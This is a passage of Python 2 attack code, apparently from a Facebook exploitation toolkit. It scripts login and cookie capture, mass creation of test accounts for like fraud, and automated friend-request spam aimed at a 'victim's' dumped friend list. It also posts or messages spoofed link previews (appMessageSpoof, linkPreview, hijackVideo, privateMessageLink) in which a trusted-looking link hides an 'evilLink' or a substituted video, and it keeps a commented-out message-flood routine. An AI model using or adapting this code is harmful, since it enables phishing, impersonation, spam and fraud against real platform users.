driver.get("https://www.facebook.com/")
assert "Facebook" in driver.title
elem = driver.find_element_by_name("email")
elem.send_keys(email)
elem = driver.find_element_by_name("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
all_cookies = driver.get_cookies()
pickle.dump( driver.get_cookies() , open("cookies.pkl","wb"))
assert "No results found." not in driver.page_source
driver.close()
for s_cookie in all_cookies:
cj.set_cookie(cookielib.Cookie(version = 0, name = s_cookie['name'], value = s_cookie['value'], port = '80', port_specified = False, domain = s_cookie['domain'], domain_specified = True, domain_initial_dot = False, path = s_cookie['path'], path_specified = True, secure = s_cookie['secure'], expires = s_cookie['expiry'], discard = False, comment = None, comment_url = None, rest = None, rfc2109 = False))
try:
if cookieHandler.isLogged(cj) == True:
#Checkpoint exists (?)
if cookieHandler.checkPoint(cj) == True:
blocked = 1
print 'Error - Checkpoint reached, your account may be blocked'
return -1
# Assign cookies to array
if state != 'real':
cookieArray.append(cj._cookies)
else:
logs('Logging failed')
print '\rLogging failed, check credentials and try again\r'
return -1
except signalCaught as e:
deleteUser(10)
message = '%s catch from login' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def set_dtsg():
n = 0
flag = False
try:
response = br.open('https://www.facebook.com/')
''' Old dtsg set module..
for form in br.forms():
for control in form.controls:
if control.name == 'fb_dtsg':
flag = True
break
n += 1
if flag: break
br.select_form(nr=n-1) '''
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the dtsg set module')
print '\rTrying to set dtsg \r'
return workarounddtsg()
def workarounddtsg():
try:
response = br.open('https://www.facebook.com/')
parse = response.read()
match = re.search("\"fb_dtsg\"", parse)
matchBis = re.search("value=\"",parse[match.end():])
matchBisBis = re.search("\"",parse[match.end()+matchBis.end():])
fb_dtsg = parse[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
return fb_dtsg
except:
print 'error'
return 0
def getC_user():
# Get the c_user value from the cookie
#Filtramos la cookie para obtener el nombre de usuario
for cookie in cj:
if (cookie.name == 'c_user'):
c_user = cookie.value
return str(c_user)
def createUser(number):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'__user' : c_user,
'__a' : '1',
'__dyn' : '798aD5z5zufEa0',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'phstamp' : '16581655751108754574',
}
datos = urlencode(arguments)
userRaw = []
percentage = 0.0
print 'Creating Test Users .. '
for i in range(int(number)):
try:
response = br.open('https://www.facebook.com/ajax/whitehat/create_test_user.php',datos)
userRaw.append(str(response.read()))
percentage = (i * 100.0) / int(number)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
sleep(60)
except mechanize.HTTPError as e:
logs(str(e.code) + ' on iteration ' + str(i))
print str(e.code) + ' on iteration %d'%i
except mechanize.URLError as e:
logs(str(e.reason.args) + ' on iteration ' + str(i))
print str(e.reason.args) + ' on iteration %d'%i
except signalCaught as e:
raise signalCaught(str(e.args[0])+' handling from createUser.. ')
except:
logs('Error in create module on iteration ' + str(i))
print '\r \r',
print '\rError in create module on iteration %d\r' %i,
fullFlag = MyParser.parseData(userRaw)
return fullFlag
'''
def deleteUser():
#Number is the max amount of test user accounts - Modify this value if the platform change
number = 10
itemNum = 0
users = []
ids = []
try:
request = br.open("https://www.facebook.com/whitehat/accounts/")
except mechanize.HTTPError as e:
logs(str(e.code) + ' on deleteUser module')
print str(e.code) + ' on deleteUser module'
except mechanize.URLError as e:
logs(str(e.reason.args) + ' on deleteUser module')
print str(e.reason.args) + ' on deleteUser module'
i = 0
for form in br.forms():
try:
form.find_control('selected_test_users[]').items
br.select_form(nr=i)
break
except:
i += 1
continue
try:
for item in br.form.find_control('selected_test_users[]').items:
users.append(item.name)
br.form.find_control('selected_test_users[]').items[itemNum].selected = True
itemNum += 1
string = list(br.forms())[1]['fb_dtsg']
i = 0
dictioUser = {'fb_dtsg':str(string)}
for parameters in users:
if (i <= number):
dictioUser['selected_test_users['+str(i)+']'] = parameters
i += 1
for elements in dictioUser:
ids.append(str(dictioUser[str(elements)]))
dictioUser['__user'] = str(getC_user())
dictioUser['__a'] = '1'
dictioUser['__dyn'] = '7n8ahyj35zolgDxqihXzA'
dictioUser['__req'] = 'a'
dictioUser['phstamp'] = '1658168991161218151159'
datos = urlencode(dictioUser)
response = br.open('https://www.facebook.com/ajax/whitehat/delete_test_users.php',datos)
if globalLogging:
logs(request.read())
logs(response.read())
except:
logs('No users for eliminate')
print '\rNo users for eliminate\r'
'''
def deleteUser(appId):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'__user' : str(getC_user()),
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo5O12wYw',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581718683108776783808786',
'__rev' : '1409158'
}
testUserID = database.getUsers()
for n in len(testUserID[0]):
arguments['test_user_ids['+str(n)+']'] = str(testUserID[0][n])
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/async/test-users/delete/?app_id='+appId,datos)
if globalLogging:
logs(response.read())
except:
logs('Error deleting users')
print 'Error deleting users \n'
def massLogin():
i = int(0)
people = database.getUsersNotLogged()
#Flush
print '\r \r',
loadPersistentCookie()
for person in people:
#login
rsp = login(str(person[0]),str(person[3]),'test')
#percentage
i+=1
percentage = (i * 100.0) / len(people)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
if rsp == -1:
database.removeTestUsers(person[0])
savePersistentCookie()
def friendshipRequest():
if (len(cookieArray) == 1):
massLogin()
userID = database.getUsers()
for cookies in range(len(cookieArray)):
cj._cookies = cookieArray[cookies]
c_user = getC_user()
users = 0
for person in userID:
'''---------------------Comienza el envio de solicitudes ... ----------------------- '''
if users > cookies:
sendRequest(person[0],c_user)
users += 1
def sendRequest(userID,c_user):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'phstamp' : '1658165688376111103320'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
except:
logs('Error sending request ')
print 'Error sending request \n'
def sendRequestToList(victim):
root = 'dumps'
directory = victim
friends = []
frieds_send = []
count = 0
number = raw_input('Insert the amount of requests to send: ')
try:
try:
persons = open( os.path.join(root,directory,victim+".txt"),"rb" )
except:
logs('Friend file not found')
print 'Friend file not found'
return
try:
persons_send = open( os.path.join(root,directory,victim+"_friend_send.txt"),"rb")
while True:
linea = persons_send.readline()
if not linea:
break
frieds_send.append(linea.strip("\n\r"))
persons_send.close()
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"ab")
except:
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"wb")
while True:
linea = persons.readline()
if not linea:
break
friends.append(linea.strip("\n\r"))
i = 0.0
percentage = 0.0
print 'Sending friend requests'
for userID in friends:
if userID not in frieds_send:
#Escape condition
if count > int(number):
persons_send.close()
return
count += 1
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265817211599516953787450107',
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
#percentage
percentage = (i * 100.0) / len(friends)
i+=1
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
persons_send.write(userID+'\n')
except:
logs('Error sending request ')
print 'Error sending request \n'
except signalCaught as e:
message = '%s catch from send request module' %e.args[0]
logs(str(message))
print '%s \n' %message
persons_send.close()
raw_input('Press enter to continue')
return
def acceptRequest():
initAccept()
acceptIDS = MyParser.parsePending()
while len(acceptIDS) != 0:
for elements in acceptIDS:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'action' : 'confirm',
'id' : elements,
'ref' : '%2Freqs.php',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'm',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816867997811675120'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/requests/friends/ajax/ ',datos)
if globalLogging:
logs(response.read())
print 'Accept done! \n'
initAccept()
acceptIDS = MyParser.parsePending()
def initAccept():
f = open("respuesta.html","wb")
response = br.open('https://www.facebook.com/friends/requests/')
''' Se guarda el output de la respuesta html para ser parseada y filtrar los ID's '''
f.write(response.read())
f.close()
def savePersistentCookie():
f = open("cookiesObject","wb")
pickle.dump(cookieArray,f)
f.close()
for element in cookieArray:
cj._cookies = element
for cookie in cj:
if (cookie.name == 'c_user'):
c_user = cookie.value
database.setLogged(c_user)
def loadPersistentCookie():
global cookieArray
try:
f = open("cookiesObject","r")
cookieArray = pickle.load(f)
i = 0
''' Se limpian las cookies que no sirven - se filtra el id para cambiar su estado a logged = 0 '''
for cookie in cookieArray:
cj._cookies = cookie
for element in cj:
if (element.name == 'checkpoint'):
strip = str(element.value).strip("%7B%22u%22%3A")
removeId = strip.split("%2C%22t%22%3A")[0]
database.setLoggedOut(removeId)
del cookieArray[i]
i+=1
except:
return
def deleteAccounts():
people = database.getUsers()
for person in people:
database.removeTestUsers(person[0])
cookieArray[:] = []
def like(postId, quantity):
signal.signal(signal.SIGINT, signal_handler)
try:
email,password = setMail()
if (login(email,password,'real') is not -1):
#Cookie of the real account
masterCookie = cj._cookies
times = int(quantity) / 10
for i in range(times):
cj._cookies = masterCookie
#Check if users already exists
if ( createUser(10) == -1 ):
#Delete existing users and re-execute the create module
deleteUser()
deleteAccounts()
createUser(10)
massLogin()
#Percentage container
percentage = 0.0
j = 0.0
total = len(cookieArray) * len(postId)
#flush
print '\r \r',
for i in range(len(cookieArray)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
deleteUser()
deleteAccounts()
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def appMessageSpoof(appId,link,picture,title,domain,description,comment):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : br.form['fb_dtsg'],
'preview' : '0',
'_path' : 'feed',
'app_id' : int(appId),
'redirect_uri' : 'https://facebook.com',
'display' : 'page',
'link' : str(link),
'picture' : str(picture),
'name' : str(title),
'caption' : str(domain),
'description' : str(description),
'from_post' : '1',
'feedform_user_message' : str(comment),
'publish' : 'Share',
'audience[0][value]' : '80',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/dialog/feed',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de appMessageSpoof()')
print 'Error en el modulo de appMessageSpoof()\n'
def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID, privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42',
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/FxyecjOQXnI?autohide=1&version=3&autoplay=1',
'attachment[params][video][0][width]' : '1280',
'attachment[params][video][0][height]' : '720',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : '92',
'link_metrics[summary_len]' : '160',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1280',
'link_metrics[image_dimensions][1]' : '720',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '398',
'composer_metrics[best_image_h]' : '208',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1058',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394761251',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'm',
'ttstamp' : '26581658074898653',
'__rev' : '1161243',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
def linkPreview(link,realLink,title,summary,comment,image,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '787d2fec-b5c1-41fe-bbda-3450a03240c6',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"27c5e963","clearcounter":0,"elementid":"u_0_2n","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(realLink),
'attachment[params][urlInfo][final]' : str(realLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : str(realLink)+'/images/favicon.ico',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : str(image),
'attachment[params][medium]' : '106',
'attachment[params][url]' : str(realLink),
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : str(realLink),
'link_metrics[base_domain]' : str(realLink),
'link_metrics[title_len]' : '38',
'link_metrics[summary_len]' : '38',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '3',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '322',
'link_metrics[image_dimensions][1]' : '70',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '5',
'link_metrics[images_cap]' : '3',
'link_metrics[images_type]' : 'ranked',
'composer_metrics[best_image_w]' : '100',
'composer_metrics[best_image_h]' : '100',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '812',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394765332',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'h',
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreview()')
print 'Error en el modulo de linkPreview()\n'
def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '8c4e1fa6-5f1f-4c16-b393-5c1ab4c3802b',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_23',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"4b4a8369","clearcounter":0,"elementid":"u_0_2h","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(videoLink),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'attachment[params][video][0][width]' : '1920',
'attachment[params][video][0][height]' : '1080',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : str(len(title)),
'link_metrics[summary_len]' : str(len(summary)),
'link_metrics[min_dimensions][0]' : '62',
'link_metrics[min_dimensions][1]' : '62',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1920',
'link_metrics[image_dimensions][1]' : '1080',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '154',
'composer_metrics[best_image_h]' : '154',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1184',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1399663185',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : str(privacy),
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ajEAMBlynzpQ9UoGya4Cq7pEsx6iWF29aGEZ94WpUpBxCFaG',
'__req' : 'g',
'ttstamp' : '265817289113541097355755354',
'__rev' : '1241763',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
#########################################
#Vulnerability no longer available
#########################################
#def mailFlood(victim,message):
# for cookies in cookieArray:
# print cookies
# cj._cookies = cookies
# c_user = getC_user()
# print str(c_user)+'\n'
# try:
# set_dtsg()
# arguments = {
# 'message_batch[0][action_type]' : 'ma-type:user-generated-message',
# 'message_batch[0][thread_id]' : '',
# 'message_batch[0][author]' : 'fbid:'+str(c_user),
# 'message_batch[0][author_email]' : '',
# 'message_batch[0][coordinates]' : '',
# 'message_batch[0][timestamp]' : '1372638156169',
# 'message_batch[0][timestamp_absolute]' : 'Hoy',
# 'message_batch[0][timestamp_relative]' : '21:22',
# 'message_batch[0][timestamp_time_passed]' : '0',
# 'message_batch[0][is_unread]' : 'false',
# 'message_batch[0][is_cleared]' : 'false',
# 'message_batch[0][is_forward]' : 'false',
# 'message_batch[0][is_filtered_content]' : 'false',
# 'message_batch[0][spoof_warning]' : 'false',
# 'message_batch[0][source]' : 'source:titan:web',
# 'message_batch[0][body]' : str(message),
# 'message_batch[0][has_attachment]' : 'false',
# 'message_batch[0][html_body]' : 'false',
# 'message_batch[0][specific_to_list][0]' : 'email:'+str(victim),
# 'message_batch[0][specific_to_list][1]' : 'fbid:'+str(c_user),
# 'message_batch[0][forward_count]' : '0',
# 'message_batch[0][force_sms]' : 'true',
# 'message_batch[0][ui_push_phase]' : 'V3',
# 'message_batch[0][status]' : '0',
# 'message_batch[0][message_id]' : '<1372638156169:4202807677-4247395496@mail.projektitan.com>',
# 'message_batch[0][client_thread_id]' : 'pending:pending',
# 'client' : 'web_messenger',
# '__user' : str(c_user),
# '__a' : '1',
# '__dyn' : '7n8ahyj35zsyzk9UmAEKWw',
# '__req' : 'b',
# 'fb_dtsg' : br.form['fb_dtsg'],
# 'phstamp' : '16581661207177118751248'
# }
#
# datos = urlencode(arguments)
# response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)
#
# if globalLogging:
# logs(response.read())
#
# except mechanize.HTTPError as e:
# print e.code
# except mechanize.URLError as e:
# print e.reason.args
# except:
# print 'Ctrl+c SIGNAL Caught\n'
# return
def getTime():
hour = datetime.datetime.strftime(datetime.datetime.now(), '%H:%M')
if int(hour.split(':')[0]) >= 12:
hour += 'am'
else:
hour += 'pm'
return hour
def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,evilLink):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + victim,
'message_batch[0][content_attachment][subject]' : subject,
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink,
'message_batch[0][content_attachment][attachment][params][favicon]' : realLink+'/favicon.ico',
'message_batch[0][content_attachment][attachment][params][title]' : title,
'message_batch[0][content_attachment][attachment][params][summary]' : summary,
'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink,
'message_batch[0][content_attachment][attachment][params][medium]' : '106',
'message_batch[0][content_attachment][attachment][params][url]' : realLink,
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : realLink.strip('https://').strip('/'),
'message_batch[0][content_attachment][link_metrics][base_domain]' : realLink.strip('https://www.').strip('/'),
'message_batch[0][content_attachment][link_metrics][title_len]' : '38',
'message_batch[0][content_attachment][link_metrics][summary_len]' : '38',
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '322',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '5',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '3',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '6',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
